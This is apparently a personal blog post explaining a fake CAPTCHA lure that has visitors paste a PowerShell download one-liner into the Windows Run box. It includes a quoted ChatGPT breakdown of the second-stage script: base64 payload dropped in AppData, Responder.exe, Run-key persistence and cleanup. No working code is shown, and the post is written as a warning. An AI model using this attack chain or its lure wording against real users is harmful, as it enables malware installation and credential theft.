???????????????? - Verify Captcha and Got Free Computer Virus (How It Works)

After an hours of studying and doing some personal tasks on weekend I decided to grab the keyboard to enter and visit movie website. At the moment, new web page loaded and pop-up the message requested to Verify Captcha in order to proceed next step. The instruction firstly requested user to run shortcut key on keyboard Win+R that meant to use Windows Run feature. Secondly, use the combination key of Ctrl+V is to paste data in clipboard which already given by the website.

A bit strange right? why Verify Captcha require to paste or drop something into local computer? Let delve to what is inside the clipboard. Actually inside the keyboard is just the text, however, it's not moral text. It's Windows Powershell one-liner web hook download which used to download file from another remote server host. cool!.

Interesting, there is encoded text which assumed base64 format so I decided to decode and observed that it's some Powershell command and the URL of remote host that serves our visitor to download the juicy file. Can't wait so I click follow the link and my browse download it immediately (in my case named GqHQWNMv.txt). My system is Linux and the suspicious file designed for Windows platform so I hope it's not affected to my system.

Once the download completed, just open it with text editor and found out that it's another Powershell script which used to do following actions based on ChatGPT analysis.

Whole text from ChatGPT analysis

" The uploaded file appears to be a screenshot of a script written in PowerShell. Based on its structure and some of the code's keywords, it may indeed be part of a malicious payload. Let me break it down for you and analyze what it's doing:"

Key Observations:

1. Environment Variables: Set-Location $env:AppData is setting the working directory to the current user's AppData folder, a common location for malware to hide its activities.
2. Base64-Encoded String: The variable $FrbgJhKI contains a long Base64 string, likely representing an embedded payload (possibly a malicious binary or script).
3. Decoding and Writing to Disk: [System.Convert]::FromBase64String is decoding the Base64 string. [System.IO.File]::WriteAllBytes writes the decoded content to disk.
4. Creating a Directory: A directory is created using $QvRhSlfu.
5. Executing Responder: The variable $BMFSQWR contains the path to Responder.exe, a tool used for network-based attacks (e.g., capturing NTLM hashes).
6. Persistence Mechanism: Modifications to the Windows registry (HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run) add persistence by making the malicious file run at startup.
7. Cleanup: The script removes temporary files to cover its tracks.

To summarize, always stay vigilant and use the internet with caution. Reckless browsing or unsafe practices can expose you to serious risks, including malware and data theft.